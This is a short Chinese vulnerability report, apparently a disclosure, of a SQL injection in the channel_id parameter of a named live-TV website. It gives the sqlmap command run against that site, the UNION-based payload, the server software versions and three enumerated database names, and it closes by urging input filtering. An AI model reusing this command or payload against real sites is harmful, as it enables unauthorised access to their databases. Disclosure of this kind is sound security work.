注入点:http://live.pps.tv/index.php/play/get_program_by_label?channel_id=1&channel_name=GDTV1&l_type=live&t_date=111111
参数channel_id存在注入
通知存在注入点,未做进一步测试!
python sqlmap.py -u "http://live.pps.tv/index.php/play/get_program_by_label?channel_id=--&channel_name=GDTV1&l_type=live&t_date=111111" -p "channel_id" --batch --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: channel_id
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: channel_id=--') UNION ALL SELECT CONCAT(0x7162747871,0x62676850436e4d694d4b,0x71666d6b71),NULL,NULL,NULL,NULL#&channel_name=GDTV1&l_type=live&t_date=111111
---
web application technology: PHP 5.3.15
back-end DBMS: MySQL 5
available databases [3]:
[*] epg
[*] information_schema
[*] test
有效过滤修补漏洞吧